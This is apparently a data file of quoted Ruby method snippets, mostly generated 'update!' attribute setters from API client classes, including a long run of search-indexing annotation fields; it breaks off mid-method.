"def update_release(stuff, release, fields)\r\n\trelease.update(fields)\r\nend",
"def update!(**args)\n @annotation_list = args[:annotation_list] if args.key?(:annotation_list)\n @eval_data = args[:eval_data] if args.key?(:eval_data)\n @qref = args[:qref] if args.key?(:qref)\n @raw_text = args[:raw_text] if args.key?(:raw_text)\n end",
"def update\n \n end",
"def update!(**args)\n @description_anchor_time_ms = args[:description_anchor_time_ms] if args.key?(:description_anchor_time_ms)\n @description_anchor_time_to_matched_time_ms = args[:description_anchor_time_to_matched_time_ms] if args.key?(:description_anchor_time_to_matched_time_ms)\n @edit_distance = args[:edit_distance] if args.key?(:edit_distance)\n @edit_distance_ratio = args[:edit_distance_ratio] if args.key?(:edit_distance_ratio)\n @matched_description_text = args[:matched_description_text] if args.key?(:matched_description_text)\n @matched_span_text = args[:matched_span_text] if args.key?(:matched_span_text)\n end",
"def update!(**args)\n @appeal_explanation = args[:appeal_explanation] if args.key?(:appeal_explanation)\n @dispute_notes = args[:dispute_notes] if args.key?(:dispute_notes)\n @dispute_reason = args[:dispute_reason] if args.key?(:dispute_reason)\n @update_status = args[:update_status] if args.key?(:update_status)\n end",
"def update!(**args)\n @pronoun_entry = args[:pronoun_entry] if args.key?(:pronoun_entry)\n end",
"def update!(**args)\n @edit_distance = args[:edit_distance] if args.key?(:edit_distance)\n @edit_distance_ratio = args[:edit_distance_ratio] if args.key?(:edit_distance_ratio)\n @matched_description_text = args[:matched_description_text] if args.key?(:matched_description_text)\n @matched_frame_time_ms = args[:matched_frame_time_ms] if args.key?(:matched_frame_time_ms)\n @matched_ocr_text = args[:matched_ocr_text] if args.key?(:matched_ocr_text)\n end",
"def update_sound_association\n hash = @character.stance_sound_association\n if hash != nil and hash.keys.include?(@pose+1)\n @character.animation_id = hash[@pose+1]\n end\n end",
"def update!(**args)\n @signature = args[:signature] if args.key?(:signature)\n end",
"def update!(**args)\n @intent_only_no_pii = args[:intent_only_no_pii] if args.key?(:intent_only_no_pii)\n @rewritten_query = args[:rewritten_query] if args.key?(:rewritten_query)\n end",
"def update!(**args)\n @metadata = args[:metadata] if args.key?(:metadata)\n @pronoun_data = args[:pronoun_data] if args.key?(:pronoun_data)\n end",
"def update!(**args)\n @compliant_values = args[:compliant_values] if args.key?(:compliant_values)\n @instructions = args[:instructions] if args.key?(:instructions)\n @remediation_type = args[:remediation_type] if args.key?(:remediation_type)\n end",
"def update!(**args)\n @annotation_list = args[:annotation_list] if args.key?(:annotation_list)\n @eval_data = args[:eval_data] if args.key?(:eval_data)\n @play_more = args[:play_more] if args.key?(:play_more)\n @qref = args[:qref] if args.key?(:qref)\n @raw_text = args[:raw_text] if args.key?(:raw_text)\n end",
"def update!(**args)\n @info = args[:info] if args.key?(:info)\n @phrase = args[:phrase] if args.key?(:phrase)\n @source = args[:source] if args.key?(:source)\n @source_info = args[:source_info] if args.key?(:source_info)\n @target = args[:target] if args.key?(:target)\n end",
"def update!(**args)\n @auto_retrieval_info = args[:auto_retrieval_info] if args.key?(:auto_retrieval_info)\n @ios_receipt = args[:ios_receipt] if args.key?(:ios_receipt)\n @ios_secret = args[:ios_secret] if args.key?(:ios_secret)\n @phone_number = args[:phone_number] if args.key?(:phone_number)\n @play_integrity_token = args[:play_integrity_token] if args.key?(:play_integrity_token)\n @recaptcha_token = args[:recaptcha_token] if args.key?(:recaptcha_token)\n @safety_net_token = args[:safety_net_token] if args.key?(:safety_net_token)\n end",
"def update;end",
"def update!(**args)\n @gx_ids = args[:gx_ids] if args.key?(:gx_ids)\n @primary_keys = args[:primary_keys] if args.key?(:primary_keys)\n end",
"def update!(**args)\n @baseline = args[:baseline] if args.key?(:baseline)\n @box = args[:box] if args.key?(:box)\n @capline = args[:capline] if args.key?(:capline)\n @compact_symbol_boxes = args[:compact_symbol_boxes] if args.key?(:compact_symbol_boxes)\n @confidence = args[:confidence] if args.key?(:confidence)\n @is_from_dictionary = args[:is_from_dictionary] if args.key?(:is_from_dictionary)\n @is_identifier = args[:is_identifier] if args.key?(:is_identifier)\n @is_last_in_sentence = args[:is_last_in_sentence] if args.key?(:is_last_in_sentence)\n @is_numeric = args[:is_numeric] if args.key?(:is_numeric)\n @label = args[:label] if args.key?(:label)\n @penalty = args[:penalty] if args.key?(:penalty)\n @rotated_box = args[:rotated_box] if args.key?(:rotated_box)\n @symbol = args[:symbol] if args.key?(:symbol)\n @alternates = args[:alternates] if args.key?(:alternates)\n @text = args[:text] if args.key?(:text)\n @writing_direction = args[:writing_direction] if args.key?(:writing_direction)\n end",
"def update!(**args)\n @bounding_poly = args[:bounding_poly] if args.key?(:bounding_poly)\n @confidence = args[:confidence] if args.key?(:confidence)\n @orientation = args[:orientation] if args.key?(:orientation)\n @text_anchor = args[:text_anchor] if args.key?(:text_anchor)\n end",
"def update\r\n\r\n end",
"def update!(**args)\n @raw = args[:raw] if args.key?(:raw)\n end",
"def update!(**args)\n @command = args[:command] if args.key?(:command)\n @open_question = args[:open_question] if args.key?(:open_question)\n @polar_question = args[:polar_question] if args.key?(:polar_question)\n @state_of_affairs = args[:state_of_affairs] if args.key?(:state_of_affairs)\n end",
"def update!(**args)\n @accelerated_shopping_signal = args[:accelerated_shopping_signal] if args.key?(:accelerated_shopping_signal)\n @ads_adsai_magic_apfel_apfel_region_finder_annotation = args[:ads_adsai_magic_apfel_apfel_region_finder_annotation] if args.key?(:ads_adsai_magic_apfel_apfel_region_finder_annotation)\n @ads_adsai_magic_magic_page_type_annotation = args[:ads_adsai_magic_magic_page_type_annotation] if args.key?(:ads_adsai_magic_magic_page_type_annotation)\n @ads_shopping_webpx_raw_shopping_annotation = args[:ads_shopping_webpx_raw_shopping_annotation] if args.key?(:ads_shopping_webpx_raw_shopping_annotation)\n @amphtml_signed_exchange_error_details = args[:amphtml_signed_exchange_error_details] if args.key?(:amphtml_signed_exchange_error_details)\n @amphtml_signed_exchange_validation_payload = args[:amphtml_signed_exchange_validation_payload] if args.key?(:amphtml_signed_exchange_validation_payload)\n @analytics_siteid_analytics_property_annotation = args[:analytics_siteid_analytics_property_annotation] if args.key?(:analytics_siteid_analytics_property_annotation)\n @analytics_siteid_analytics_rendered_output = args[:analytics_siteid_analytics_rendered_output] if args.key?(:analytics_siteid_analytics_rendered_output)\n @authentic_site_rank_data = args[:authentic_site_rank_data] if args.key?(:authentic_site_rank_data)\n @babel_encoder_babel_encodings = args[:babel_encoder_babel_encodings] if args.key?(:babel_encoder_babel_encodings)\n @badurls_badurls_force_selection_signal = args[:badurls_badurls_force_selection_signal] if args.key?(:badurls_badurls_force_selection_signal)\n @boilerplate_annotations = args[:boilerplate_annotations] if args.key?(:boilerplate_annotations)\n @boilerplate_visible_bytes_estimates = args[:boilerplate_visible_bytes_estimates] if args.key?(:boilerplate_visible_bytes_estimates)\n @chrome_counts = args[:chrome_counts] if args.key?(:chrome_counts)\n @commerce_dataquality_organic_crawled_seller_data = args[:commerce_dataquality_organic_crawled_seller_data] if args.key?(:commerce_dataquality_organic_crawled_seller_data)\n @commerce_dataquality_organic_shopping_annotation_signal = args[:commerce_dataquality_organic_shopping_annotation_signal] if args.key?(:commerce_dataquality_organic_shopping_annotation_signal)\n @commerce_dataquality_organic_shopping_site_quality = args[:commerce_dataquality_organic_shopping_site_quality] if args.key?(:commerce_dataquality_organic_shopping_site_quality)\n @commonsense_queriosity_goldmine_qna_annotations = args[:commonsense_queriosity_goldmine_qna_annotations] if args.key?(:commonsense_queriosity_goldmine_qna_annotations)\n @commonsense_scored_compound_reference_annotation = args[:commonsense_scored_compound_reference_annotation] if args.key?(:commonsense_scored_compound_reference_annotation)\n @commonsense_stone_soup_proto_raffia_instructions_seq = args[:commonsense_stone_soup_proto_raffia_instructions_seq] if args.key?(:commonsense_stone_soup_proto_raffia_instructions_seq)\n @contra_content_review_annotations = args[:contra_content_review_annotations] if args.key?(:contra_content_review_annotations)\n @contra_curated_content = args[:contra_curated_content] if args.key?(:contra_curated_content)\n @country_country_attachment = args[:country_country_attachment] if args.key?(:country_country_attachment)\n @crawzall_signal = args[:crawzall_signal] if args.key?(:crawzall_signal)\n @creator = args[:creator] if args.key?(:creator)\n @datacommons_datacommons_triples_signal = args[:datacommons_datacommons_triples_signal] if 
args.key?(:datacommons_datacommons_triples_signal)\n @date_annotation_tags = args[:date_annotation_tags] if args.key?(:date_annotation_tags)\n @date_annotations = args[:date_annotations] if args.key?(:date_annotations)\n @date_range_annotations = args[:date_range_annotations] if args.key?(:date_range_annotations)\n @date_time_annotations = args[:date_time_annotations] if args.key?(:date_time_annotations)\n @discover_source = args[:discover_source] if args.key?(:discover_source)\n @discussion = args[:discussion] if args.key?(:discussion)\n @document_intent = args[:document_intent] if args.key?(:document_intent)\n @dots_garamond_signal = args[:dots_garamond_signal] if args.key?(:dots_garamond_signal)\n @dots_newsstand_signal = args[:dots_newsstand_signal] if args.key?(:dots_newsstand_signal)\n @email_address_annotations = args[:email_address_annotations] if args.key?(:email_address_annotations)\n @extracted_book_info = args[:extracted_book_info] if args.key?(:extracted_book_info)\n @fatcat_compact_doc_classification = args[:fatcat_compact_doc_classification] if args.key?(:fatcat_compact_doc_classification)\n @fatcat_site_verticals_annotation = args[:fatcat_site_verticals_annotation] if args.key?(:fatcat_site_verticals_annotation)\n @firstseen = args[:firstseen] if args.key?(:firstseen)\n @fonts_analysis_annotator_fonts_annotation = args[:fonts_analysis_annotator_fonts_annotation] if args.key?(:fonts_analysis_annotator_fonts_annotation)\n @forum_ranking_forum_posts_safe_search_annotation = args[:forum_ranking_forum_posts_safe_search_annotation] if args.key?(:forum_ranking_forum_posts_safe_search_annotation)\n @foundation_splinter_signal = args[:foundation_splinter_signal] if args.key?(:foundation_splinter_signal)\n @freshbox_freshbox_article_annotation = args[:freshbox_freshbox_article_annotation] if args.key?(:freshbox_freshbox_article_annotation)\n @geo_point_annotations = args[:geo_point_annotations] if args.key?(:geo_point_annotations)\n @geo_point_resolution = args[:geo_point_resolution] if args.key?(:geo_point_resolution)\n @geostore_address_proto = args[:geostore_address_proto] if args.key?(:geostore_address_proto)\n @i2e_v2_image_entities_infos = args[:i2e_v2_image_entities_infos] if args.key?(:i2e_v2_image_entities_infos)\n @image_content_annotation_labels = args[:image_content_annotation_labels] if args.key?(:image_content_annotation_labels)\n @image_content_color_search_color_detection_results = args[:image_content_color_search_color_detection_results] if args.key?(:image_content_color_search_color_detection_results)\n @image_data_list = args[:image_data_list] if args.key?(:image_data_list)\n @image_extra_image_extra_terms = args[:image_extra_image_extra_terms] if args.key?(:image_extra_image_extra_terms)\n @image_monetization_featured_document_properties = args[:image_monetization_featured_document_properties] if args.key?(:image_monetization_featured_document_properties)\n @image_mustang_favicon_info = args[:image_mustang_favicon_info] if args.key?(:image_mustang_favicon_info)\n @image_mustang_websearch_image_snippet_response = args[:image_mustang_websearch_image_snippet_response] if args.key?(:image_mustang_websearch_image_snippet_response)\n @image_quality_labelmaker_doc_media_labels = args[:image_quality_labelmaker_doc_media_labels] if args.key?(:image_quality_labelmaker_doc_media_labels)\n @image_quality_landing_page_proto_landing_page_salient_text_set = args[:image_quality_landing_page_proto_landing_page_salient_text_set] if 
args.key?(:image_quality_landing_page_proto_landing_page_salient_text_set)\n @image_quality_layout_document = args[:image_quality_layout_document] if args.key?(:image_quality_layout_document)\n @image_quality_richdata_proto_image_anchor = args[:image_quality_richdata_proto_image_anchor] if args.key?(:image_quality_richdata_proto_image_anchor)\n @image_quality_richdata_proto_richdata = args[:image_quality_richdata_proto_richdata] if args.key?(:image_quality_richdata_proto_richdata)\n @image_quality_salient_terms_image_query_smearing_list = args[:image_quality_salient_terms_image_query_smearing_list] if args.key?(:image_quality_salient_terms_image_query_smearing_list)\n @image_quality_salient_terms_image_salient_term_set_map = args[:image_quality_salient_terms_image_salient_term_set_map] if args.key?(:image_quality_salient_terms_image_salient_term_set_map)\n @image_quality_sensitive_face_skin_tone_signals = args[:image_quality_sensitive_face_skin_tone_signals] if args.key?(:image_quality_sensitive_face_skin_tone_signals)\n @image_quality_sensitive_media_or_people_entities = args[:image_quality_sensitive_media_or_people_entities] if args.key?(:image_quality_sensitive_media_or_people_entities)\n @image_repository_geolocation = args[:image_repository_geolocation] if args.key?(:image_repository_geolocation)\n @image_repository_picasa_geo_data = args[:image_repository_picasa_geo_data] if args.key?(:image_repository_picasa_geo_data)\n @image_search_rejected_image_info_list = args[:image_search_rejected_image_info_list] if args.key?(:image_search_rejected_image_info_list)\n @image_stock_stock_image_annotation = args[:image_stock_stock_image_annotation] if args.key?(:image_stock_stock_image_annotation)\n @imageembed = args[:imageembed] if args.key?(:imageembed)\n @indexing_annotations_annotation_meta = args[:indexing_annotations_annotation_meta] if args.key?(:indexing_annotations_annotation_meta)\n @indexing_annotations_app_market_app_market_annotation = args[:indexing_annotations_app_market_app_market_annotation] if args.key?(:indexing_annotations_app_market_app_market_annotation)\n @indexing_annotations_apps_cache_colon_annotation = args[:indexing_annotations_apps_cache_colon_annotation] if args.key?(:indexing_annotations_apps_cache_colon_annotation)\n @indexing_annotations_apps_doc_restrictions_doc_preview_restrictions_annotation = args[:indexing_annotations_apps_doc_restrictions_doc_preview_restrictions_annotation] if args.key?(:indexing_annotations_apps_doc_restrictions_doc_preview_restrictions_annotation)\n @indexing_annotations_automobile_vin_annotator_automobile_vin_annotations = args[:indexing_annotations_automobile_vin_annotator_automobile_vin_annotations] if args.key?(:indexing_annotations_automobile_vin_annotator_automobile_vin_annotations)\n @indexing_annotations_canonical_url = args[:indexing_annotations_canonical_url] if args.key?(:indexing_annotations_canonical_url)\n @indexing_annotations_clean_text_proto = args[:indexing_annotations_clean_text_proto] if args.key?(:indexing_annotations_clean_text_proto)\n @indexing_annotations_collections_doc_collections = args[:indexing_annotations_collections_doc_collections] if args.key?(:indexing_annotations_collections_doc_collections)\n @indexing_annotations_comment_block_groups = args[:indexing_annotations_comment_block_groups] if args.key?(:indexing_annotations_comment_block_groups)\n @indexing_annotations_dataset_model_annotation = args[:indexing_annotations_dataset_model_annotation] if 
args.key?(:indexing_annotations_dataset_model_annotation)\n @indexing_annotations_dates_date_times = args[:indexing_annotations_dates_date_times] if args.key?(:indexing_annotations_dates_date_times)\n @indexing_annotations_doc_importance = args[:indexing_annotations_doc_importance] if args.key?(:indexing_annotations_doc_importance)\n @indexing_annotations_doc_restrictions_in_doc_restrictions_annotation = args[:indexing_annotations_doc_restrictions_in_doc_restrictions_annotation] if args.key?(:indexing_annotations_doc_restrictions_in_doc_restrictions_annotation)\n @indexing_annotations_entity_page = args[:indexing_annotations_entity_page] if args.key?(:indexing_annotations_entity_page)\n @indexing_annotations_feedback_set = args[:indexing_annotations_feedback_set] if args.key?(:indexing_annotations_feedback_set)\n @indexing_annotations_i_bert_embedding_annotation = args[:indexing_annotations_i_bert_embedding_annotation] if args.key?(:indexing_annotations_i_bert_embedding_annotation)\n @indexing_annotations_image_repository_image_license_info_annotation = args[:indexing_annotations_image_repository_image_license_info_annotation] if args.key?(:indexing_annotations_image_repository_image_license_info_annotation)\n @indexing_annotations_pcu_amp_error = args[:indexing_annotations_pcu_amp_error] if args.key?(:indexing_annotations_pcu_amp_error)\n @indexing_annotations_pcu_signed_exchange_info = args[:indexing_annotations_pcu_signed_exchange_info] if args.key?(:indexing_annotations_pcu_signed_exchange_info)\n @indexing_annotations_person_person_annotation = args[:indexing_annotations_person_person_annotation] if args.key?(:indexing_annotations_person_person_annotation)\n @indexing_annotations_sdu_page_type_annotation = args[:indexing_annotations_sdu_page_type_annotation] if args.key?(:indexing_annotations_sdu_page_type_annotation)\n @indexing_annotations_social_links_social_links_annotation = args[:indexing_annotations_social_links_social_links_annotation] if args.key?(:indexing_annotations_social_links_social_links_annotation)\n @indexing_annotations_subscribewithgoogle_swg_annotation = args[:indexing_annotations_subscribewithgoogle_swg_annotation] if args.key?(:indexing_annotations_subscribewithgoogle_swg_annotation)\n @indexing_annotations_twitter_embedded_tweets_annotation = args[:indexing_annotations_twitter_embedded_tweets_annotation] if args.key?(:indexing_annotations_twitter_embedded_tweets_annotation)\n @indexing_annotations_typed_number_typed_number_annotations = args[:indexing_annotations_typed_number_typed_number_annotations] if args.key?(:indexing_annotations_typed_number_typed_number_annotations)\n @indexing_annotations_wa_passages_query_to_passage_annotations = args[:indexing_annotations_wa_passages_query_to_passage_annotations] if args.key?(:indexing_annotations_wa_passages_query_to_passage_annotations)\n @indexing_annotations_wa_passages_trimmed_query_to_passage_annotations = args[:indexing_annotations_wa_passages_trimmed_query_to_passage_annotations] if args.key?(:indexing_annotations_wa_passages_trimmed_query_to_passage_annotations)\n @indexing_apps_affiliated_instant_app_info = args[:indexing_apps_affiliated_instant_app_info] if args.key?(:indexing_apps_affiliated_instant_app_info)\n @indexing_apps_merged_app_info_annotation = args[:indexing_apps_merged_app_info_annotation] if args.key?(:indexing_apps_merged_app_info_annotation)\n @indexing_badpages_bad_page_parse_result = args[:indexing_badpages_bad_page_parse_result] if args.key?(:indexing_badpages_bad_page_parse_result)\n 
@indexing_badpages_collapser_info = args[:indexing_badpages_collapser_info] if args.key?(:indexing_badpages_collapser_info)\n @indexing_badpages_index_selection_removal = args[:indexing_badpages_index_selection_removal] if args.key?(:indexing_badpages_index_selection_removal)\n @indexing_badpages_login_page_result = args[:indexing_badpages_login_page_result] if args.key?(:indexing_badpages_login_page_result)\n @indexing_badpages_unified_model_features = args[:indexing_badpages_unified_model_features] if args.key?(:indexing_badpages_unified_model_features)\n @indexing_bering_publisher_on_page_ads_annotation = args[:indexing_bering_publisher_on_page_ads_annotation] if args.key?(:indexing_bering_publisher_on_page_ads_annotation)\n @indexing_centerpiece_center_piece_annotations = args[:indexing_centerpiece_center_piece_annotations] if args.key?(:indexing_centerpiece_center_piece_annotations)\n @indexing_centerpiece_centerpiece_checksums = args[:indexing_centerpiece_centerpiece_checksums] if args.key?(:indexing_centerpiece_centerpiece_checksums)\n @indexing_centerpiece_component_learning_source = args[:indexing_centerpiece_component_learning_source] if args.key?(:indexing_centerpiece_component_learning_source)\n @indexing_centerpiece_section_title_annotations = args[:indexing_centerpiece_section_title_annotations] if args.key?(:indexing_centerpiece_section_title_annotations)\n @indexing_converter_content_generation_info = args[:indexing_converter_content_generation_info] if args.key?(:indexing_converter_content_generation_info)\n @indexing_converter_content_parser_results = args[:indexing_converter_content_parser_results] if args.key?(:indexing_converter_content_parser_results)\n @indexing_converter_file_meta_info = args[:indexing_converter_file_meta_info] if args.key?(:indexing_converter_file_meta_info)\n @indexing_converter_link_rel_outlinks = args[:indexing_converter_link_rel_outlinks] if args.key?(:indexing_converter_link_rel_outlinks)\n @indexing_converter_meta_detectors_results_proto = args[:indexing_converter_meta_detectors_results_proto] if args.key?(:indexing_converter_meta_detectors_results_proto)\n @indexing_converter_pdf_file_meta_info = args[:indexing_converter_pdf_file_meta_info] if args.key?(:indexing_converter_pdf_file_meta_info)\n @indexing_converter_pdf_page_annotations = args[:indexing_converter_pdf_page_annotations] if args.key?(:indexing_converter_pdf_page_annotations)\n @indexing_custom_corpus_cdm_annotations = args[:indexing_custom_corpus_cdm_annotations] if args.key?(:indexing_custom_corpus_cdm_annotations)\n @indexing_deepweb_store_list_annotation = args[:indexing_deepweb_store_list_annotation] if args.key?(:indexing_deepweb_store_list_annotation)\n @indexing_docjoiner_serving_time_cluster_ids = args[:indexing_docjoiner_serving_time_cluster_ids] if args.key?(:indexing_docjoiner_serving_time_cluster_ids)\n @indexing_docjoiner_wiki_info = args[:indexing_docjoiner_wiki_info] if args.key?(:indexing_docjoiner_wiki_info)\n @indexing_docskeleton_repeated_pattern_repeated_pattern_annotation = args[:indexing_docskeleton_repeated_pattern_repeated_pattern_annotation] if args.key?(:indexing_docskeleton_repeated_pattern_repeated_pattern_annotation)\n @indexing_dups_localized_localized_cluster = args[:indexing_dups_localized_localized_cluster] if args.key?(:indexing_dups_localized_localized_cluster)\n @indexing_fresh_scheduler_fresh_scheduler_double_instant_extension = args[:indexing_fresh_scheduler_fresh_scheduler_double_instant_extension] if 
args.key?(:indexing_fresh_scheduler_fresh_scheduler_double_instant_extension)\n @indexing_fresh_scheduler_outlink_discovery_historical_hubs_signal = args[:indexing_fresh_scheduler_outlink_discovery_historical_hubs_signal] if args.key?(:indexing_fresh_scheduler_outlink_discovery_historical_hubs_signal)\n @indexing_images_related_image_signal = args[:indexing_images_related_image_signal] if args.key?(:indexing_images_related_image_signal)\n @indexing_instant_active_cluster_scorer_signal = args[:indexing_instant_active_cluster_scorer_signal] if args.key?(:indexing_instant_active_cluster_scorer_signal)\n @indexing_instant_base_reindex_whitelist_data = args[:indexing_instant_base_reindex_whitelist_data] if args.key?(:indexing_instant_base_reindex_whitelist_data)\n @indexing_instant_cluster_scorer_article = args[:indexing_instant_cluster_scorer_article] if args.key?(:indexing_instant_cluster_scorer_article)\n @indexing_instant_cluster_scorer_signal = args[:indexing_instant_cluster_scorer_signal] if args.key?(:indexing_instant_cluster_scorer_signal)\n @indexing_instant_historical_content_signals = args[:indexing_instant_historical_content_signals] if args.key?(:indexing_instant_historical_content_signals)\n @indexing_instant_news_highly_cited_document_signal = args[:indexing_instant_news_highly_cited_document_signal] if args.key?(:indexing_instant_news_highly_cited_document_signal)\n @indexing_instant_news_images_info = args[:indexing_instant_news_images_info] if args.key?(:indexing_instant_news_images_info)\n @indexing_instant_signal_source_tags_extension = args[:indexing_instant_signal_source_tags_extension] if args.key?(:indexing_instant_signal_source_tags_extension)\n @indexing_lattice_lattice_annotations = args[:indexing_lattice_lattice_annotations] if args.key?(:indexing_lattice_lattice_annotations)\n @indexing_metrics_url_indexing_props = args[:indexing_metrics_url_indexing_props] if args.key?(:indexing_metrics_url_indexing_props)\n @indexing_ml_dom_node_segments = args[:indexing_ml_dom_node_segments] if args.key?(:indexing_ml_dom_node_segments)\n @indexing_ml_entity_infoboxes = args[:indexing_ml_entity_infoboxes] if args.key?(:indexing_ml_entity_infoboxes)\n @indexing_ml_page_structure = args[:indexing_ml_page_structure] if args.key?(:indexing_ml_page_structure)\n @indexing_ml_semantic_article = args[:indexing_ml_semantic_article] if args.key?(:indexing_ml_semantic_article)\n @indexing_ml_shopping_universe_annotation = args[:indexing_ml_shopping_universe_annotation] if args.key?(:indexing_ml_shopping_universe_annotation)\n @indexing_ml_vertical_vertical_classification_result = args[:indexing_ml_vertical_vertical_classification_result] if args.key?(:indexing_ml_vertical_vertical_classification_result)\n @indexing_ml_vertical_vertical_classification_v2 = args[:indexing_ml_vertical_vertical_classification_v2] if args.key?(:indexing_ml_vertical_vertical_classification_v2)\n @indexing_mobile_client_dependent_info = args[:indexing_mobile_client_dependent_info] if args.key?(:indexing_mobile_client_dependent_info)\n @indexing_mobile_interstitials_proto_desktop_interstitials = args[:indexing_mobile_interstitials_proto_desktop_interstitials] if args.key?(:indexing_mobile_interstitials_proto_desktop_interstitials)\n @indexing_mobile_obelix_info = args[:indexing_mobile_obelix_info] if args.key?(:indexing_mobile_obelix_info)\n @indexing_mobile_smartphone_content_annotations = args[:indexing_mobile_smartphone_content_annotations] if args.key?(:indexing_mobile_smartphone_content_annotations)\n 
@indexing_mobile_smartphone_pattern_classification = args[:indexing_mobile_smartphone_pattern_classification] if args.key?(:indexing_mobile_smartphone_pattern_classification)\n @indexing_mobile_speed_page_speed_field_data = args[:indexing_mobile_speed_page_speed_field_data] if args.key?(:indexing_mobile_speed_page_speed_field_data)\n @indexing_plusone_plus_one_signal = args[:indexing_plusone_plus_one_signal] if args.key?(:indexing_plusone_plus_one_signal)\n @indexing_plusone_social_score_signal = args[:indexing_plusone_social_score_signal] if args.key?(:indexing_plusone_social_score_signal)\n @indexing_raffia_data_recovery_info = args[:indexing_raffia_data_recovery_info] if args.key?(:indexing_raffia_data_recovery_info)\n @indexing_raffia_indexing_intermediate = args[:indexing_raffia_indexing_intermediate] if args.key?(:indexing_raffia_indexing_intermediate)\n @indexing_raffia_media_processing_metadata = args[:indexing_raffia_media_processing_metadata] if args.key?(:indexing_raffia_media_processing_metadata)\n @indexing_raffia_overlay_c_doc_attachment = args[:indexing_raffia_overlay_c_doc_attachment] if args.key?(:indexing_raffia_overlay_c_doc_attachment)\n @indexing_selection_acquisition_metadata_attachment = args[:indexing_selection_acquisition_metadata_attachment] if args.key?(:indexing_selection_acquisition_metadata_attachment)\n @indexing_selection_double_indexing_extension = args[:indexing_selection_double_indexing_extension] if args.key?(:indexing_selection_double_indexing_extension)\n @indexing_selection_fast_serving_push = args[:indexing_selection_fast_serving_push] if args.key?(:indexing_selection_fast_serving_push)\n @indexing_selection_freshdocs_passthrough_extension = args[:indexing_selection_freshdocs_passthrough_extension] if args.key?(:indexing_selection_freshdocs_passthrough_extension)\n @indexing_selection_image_image_selection_attachment = args[:indexing_selection_image_image_selection_attachment] if args.key?(:indexing_selection_image_image_selection_attachment)\n @indexing_selection_language_extension = args[:indexing_selection_language_extension] if args.key?(:indexing_selection_language_extension)\n @indexing_selection_prior_scorer_parameter_set = args[:indexing_selection_prior_scorer_parameter_set] if args.key?(:indexing_selection_prior_scorer_parameter_set)\n @indexing_selection_processing_priority_extension = args[:indexing_selection_processing_priority_extension] if args.key?(:indexing_selection_processing_priority_extension)\n @indexing_selection_proto_base_promotion_info = args[:indexing_selection_proto_base_promotion_info] if args.key?(:indexing_selection_proto_base_promotion_info)\n @indexing_selection_tensor_flow_extension = args[:indexing_selection_tensor_flow_extension] if args.key?(:indexing_selection_tensor_flow_extension)\n @indexing_signal_aggregator_url_pattern_signals = args[:indexing_signal_aggregator_url_pattern_signals] if args.key?(:indexing_signal_aggregator_url_pattern_signals)\n @indexing_signals_accumulated_online_signals = args[:indexing_signals_accumulated_online_signals] if args.key?(:indexing_signals_accumulated_online_signals)\n @indexing_signals_impressions_per_day_container = args[:indexing_signals_impressions_per_day_container] if args.key?(:indexing_signals_impressions_per_day_container)\n @indexing_social_counts_social_widgets_indicator = args[:indexing_social_counts_social_widgets_indicator] if args.key?(:indexing_social_counts_social_widgets_indicator)\n @indexing_speech_goldmine_podcast_annotation = 
args[:indexing_speech_goldmine_podcast_annotation] if args.key?(:indexing_speech_goldmine_podcast_annotation)\n @indexing_speech_speech_page_properties_proto = args[:indexing_speech_speech_page_properties_proto] if args.key?(:indexing_speech_speech_page_properties_proto)\n @indexing_thirdparty_third_party_inputs = args[:indexing_thirdparty_third_party_inputs] if args.key?(:indexing_thirdparty_third_party_inputs)\n @indexing_ugc_page_param_info = args[:indexing_ugc_page_param_info] if args.key?(:indexing_ugc_page_param_info)\n @indexing_union_key_data = args[:indexing_union_key_data] if args.key?(:indexing_union_key_data)\n @indexing_url_pattern_url_tree_url_pattern_annotations = args[:indexing_url_pattern_url_tree_url_pattern_annotations] if args.key?(:indexing_url_pattern_url_tree_url_pattern_annotations)\n @indexing_videos_video_anchor_source_info = args[:indexing_videos_video_anchor_source_info] if args.key?(:indexing_videos_video_anchor_source_info)\n @indexing_videos_video_playlist_anchor_signal = args[:indexing_videos_video_playlist_anchor_signal] if args.key?(:indexing_videos_video_playlist_anchor_signal)\n @indexing_web_channels_web_channel_annotations = args[:indexing_web_channels_web_channel_annotations] if args.key?(:indexing_web_channels_web_channel_annotations)\n @infoextraction_pinpoint_pinpoint_annotation_signal = args[:infoextraction_pinpoint_pinpoint_annotation_signal] if args.key?(:infoextraction_pinpoint_pinpoint_annotation_signal)\n @infoextraction_pinpoint_pinpoint_signal = args[:infoextraction_pinpoint_pinpoint_signal] if args.key?(:infoextraction_pinpoint_pinpoint_signal)\n @instant_chrome_views = args[:instant_chrome_views] if args.key?(:instant_chrome_views)\n @instant_navboost = args[:instant_navboost] if args.key?(:instant_navboost)\n @knowledge_graph_acquisition_feeds_quotes_quotes_annotation = args[:knowledge_graph_acquisition_feeds_quotes_quotes_annotation] if args.key?(:knowledge_graph_acquisition_feeds_quotes_quotes_annotation)\n @knowledge_mining_facts_document_signals = args[:knowledge_mining_facts_document_signals] if args.key?(:knowledge_mining_facts_document_signals)\n @knowledge_mining_facts_fact_evaluation_signals = args[:knowledge_mining_facts_fact_evaluation_signals] if args.key?(:knowledge_mining_facts_fact_evaluation_signals)\n @knowledge_mining_facts_html_table_signal = args[:knowledge_mining_facts_html_table_signal] if args.key?(:knowledge_mining_facts_html_table_signal)\n @knowledge_mining_facts_kats_signals = args[:knowledge_mining_facts_kats_signals] if args.key?(:knowledge_mining_facts_kats_signals)\n @knowledge_mining_facts_localized_fact = args[:knowledge_mining_facts_localized_fact] if args.key?(:knowledge_mining_facts_localized_fact)\n @knowledge_mining_facts_object_annotations_signal = args[:knowledge_mining_facts_object_annotations_signal] if args.key?(:knowledge_mining_facts_object_annotations_signal)\n @knowledge_mining_facts_product_composition_signal = args[:knowledge_mining_facts_product_composition_signal] if args.key?(:knowledge_mining_facts_product_composition_signal)\n @knowledge_mining_facts_serving_data = args[:knowledge_mining_facts_serving_data] if args.key?(:knowledge_mining_facts_serving_data)\n @knowledge_mining_facts_shopping_signals = args[:knowledge_mining_facts_shopping_signals] if args.key?(:knowledge_mining_facts_shopping_signals)\n @knowledge_mining_facts_structured_snippets_signal = args[:knowledge_mining_facts_structured_snippets_signal] if args.key?(:knowledge_mining_facts_structured_snippets_signal)\n 
